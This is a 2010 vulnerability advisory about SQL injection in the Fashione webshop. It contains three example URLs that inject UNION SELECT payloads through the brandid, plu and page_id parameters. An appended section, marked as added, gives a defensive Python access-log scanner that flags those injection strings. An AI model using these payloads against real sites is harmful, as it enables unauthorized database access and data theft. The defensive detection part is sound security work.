# Title : Fashione E-Commerce Webshop Multiple SQL Injection Vulnerability
# Published : 2010-09-19
# Author : secret
#####################################################################
# Exploit Title: Fashione E-Commerce Webshop Multiple SQL Injection Vulnerabilities
# Date: 2010-09-19
# Author: secret
# Contact : mohammed.atta@hotmail.com / ICQ : 17-33-77
# Site : swissfaking.net/board
# Software Link: http://www.fashione.co.uk/
# Version: All versions so far
# Tested on: XP
# Fixed? : NOT FIXED
----------------------------------------------------------------------------
[Multiple SQL Injection Vulnerabilities] "brandid=" / "plu=" / "page_id="
e.g. http://server/index.php?page_id=-1+and+1=0+Union+Select+[VISIBLE],2,3,4
e.g. http://server/index.php?page_id=prod&brandid=248&brand_name=LUKE 1977&plu=0001246502+and+1=0+Union+Select+[VISIBLE],2,3,4
e.g. http://server/index.php?page_id=prod&brandid=248+and+1=0+Union+Select+[VISIBLE],2,3,4
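Added example, not part of the original advisory and not the vendor's code: a log check that flags requests where any of the three parameters named above carries something other than the plain values seen in the advisory's normal URLs. The value patterns, function names and log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed value shapes, inferred only from the benign parts of the advisory's URLs.
EXPECTED = {
    "brandid": re.compile(r"\d{1,10}"),
    "plu": re.compile(r"\d{1,20}"),
    "page_id": re.compile(r"[A-Za-z0-9_]{1,32}"),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Sep/2010:10:00:01 +0000] "GET /index.php?page_id=prod&brandid=248&plu=0001246502 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [19/Sep/2010:10:00:05 +0000] "GET /index.php?page_id=prod&brandid=248+and+1=0+Union+Select+1,2,3,4 HTTP/1.1" 200 4811',
    '192.0.2.77 - - [19/Sep/2010:10:00:09 +0000] "GET /index.php?page_id=-1%20and%201=0 HTTP/1.1" 200 300',
]


def suspicious_params(url):
    """Return sorted (name, decoded value) pairs that break the allowlist."""
    hits = set()
    # parse_qs decodes both '+' and %XX, so either encoding of a space is caught.
    for name, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        pattern = EXPECTED.get(name.lower())
        if pattern is None:
            continue  # parameters the advisory does not name are out of scope
        hits.update((name.lower(), v) for v in values if not pattern.fullmatch(v))
    return sorted(hits)


def scan_access_log(lines):
    """Return (line_number, hits) for each request with a non-conforming value."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue  # not a request line in the assumed combined log format
        hits = suspicious_params(match.group(1))
        if hits:
            findings.append((number, hits))
    return findings


if __name__ == "__main__":
    for number, hits in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: {hits}")
```

The same allowlist patterns can be enforced on input before the query is built, alongside parameterized queries, since the advisory lists the issue as not fixed.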
################################################################################################
[THANKS TO]
ALLAH
To all my brothers & sisters in IRAN - god bless you - support the GREEN REVOLUTION